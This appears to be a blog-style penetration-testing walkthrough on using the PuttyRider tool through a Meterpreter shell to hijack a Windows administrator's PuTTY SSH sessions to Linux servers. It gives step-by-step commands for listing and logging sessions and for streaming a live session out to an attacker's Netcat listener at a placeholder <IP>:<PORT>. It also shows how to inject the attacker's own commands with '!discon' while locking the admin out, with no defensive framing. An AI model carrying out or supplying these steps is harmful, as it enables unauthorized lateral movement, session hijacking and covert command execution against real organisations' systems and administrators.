So say we have a scenario where you have Meterpreter access to a Windows host. The environment has both Windows and Linux systems and while you have obtained Domain Administrator access, the Linux root password and other accounts are not the same as the Windows side and you do not know the password or there are no vulnerabilities to exploit. You know the administrator has access, they have Putty on their machine, and it is only a matter of time until they connect (or maybe they are already connected!). So what can we do to gain access?
Well we could use out Meterpreter shell to log keystrokes, but that only helps if they are logging in and we know they are logging into our target machine.
We could look for keys on the system to connect (if they use public key authentication), but say for this example they don’t.
Why not take over their session, or better yet, ride along with them!
This is where PuttyRider comes in. Created by Adrian Furtuna, PuttyRider will inject into the Putty process so you can see what the admin sees, and types!
But that isn’t good enough. I want to be able to take over the session and inject my OWN commands! Well PuttyRider does that too!
First, go grab PuttyRider from here: https://github.com/seastorm/PuttyRider
Then go to your Meterpreter shell. Wait, you don’t have one?! Well why not?! GO GET ONE and then come back. It’s OK. I’ll wait.
Alright! You now have your Meterpreter shell and the PuttyRider files. Upload those bad boys to your target. It’s easy; just navigate where you want them:
Then upload them to the target:
Cool. Now the pieces are falling into place. So what’s next? Well, that depends on if a Putty session is open yet or not. Let’s see if one is open. To do so (puttyrider -l):
If there is an existing session, log the session to review it later by using the command (puttyrider -p 0 -f):
(-p 0 finds the first putty instance. If you want a specific instance, put the PID in instead of 0)
Then you can review the file by first killing the hook (puttyrider –x) and typing the file output on screen (type <filename>).
That is pretty cool, but I want to interact with the session. Well, then instead of '–f', use '–r <IP>:<PORT>', but first, we need a Netcat listener.
Now that we have our listener, issue the command (puttyrider -p 0 -r <IP>:<PORT>):
And now look at your Netcat listener. It’s connected! Now you can see what the admin types as he/she types! Awesome!
Now if the admin has not connected a Putty session yet, just use the command (puttyrider -w -r <IP>:<PORT>):
Make sure your Netcat listener is up and running and when the admin opens Putty, Presto!
Now for the interaction, this is just seeing what the admin types. I want to issue my own commands! Well to do that, just use ‘!discon’ to allow you to type commands.
IMPORTANT: The admin will not see what you type, but will also not be able to type in the window. They MAY close out and open a new session, but that’s OK, you have puttyrider listening for a new connection right?!
Winner Winner, Chicken Dinner!
(Oh yeah, you can allow the admin access back to their session by using the ‘!recon’ command.)
So there you go. We now have access to machines we didn't previously!